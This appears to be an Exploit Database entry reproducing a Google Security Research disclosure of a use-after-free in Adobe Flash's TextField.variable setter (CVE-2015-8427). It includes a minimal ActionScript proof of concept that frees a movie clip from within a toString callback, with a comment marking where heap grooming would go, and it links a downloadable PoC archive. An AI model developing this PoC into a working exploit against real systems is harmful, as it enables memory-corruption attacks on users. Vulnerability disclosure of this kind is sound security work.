Adobe Flash - TextField.Variable Setter Use-After-Free

Author: Google Security Research
type: dos
platform: windows
port: 
date_added: 2015-12-18 
date_updated: 2015-12-18 
verified: 1 
codes: CVE-2015-8427;OSVDB-131229 
tags: 
aliases:  
screenshot_url:  
application_url: 

Source: https://code.google.com/p/google-security-research/issues/detail?id=579

There is a use-after-free in the TextField.variable setter. If the variable name that is added is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.variable = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "myvar";

	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39050.zip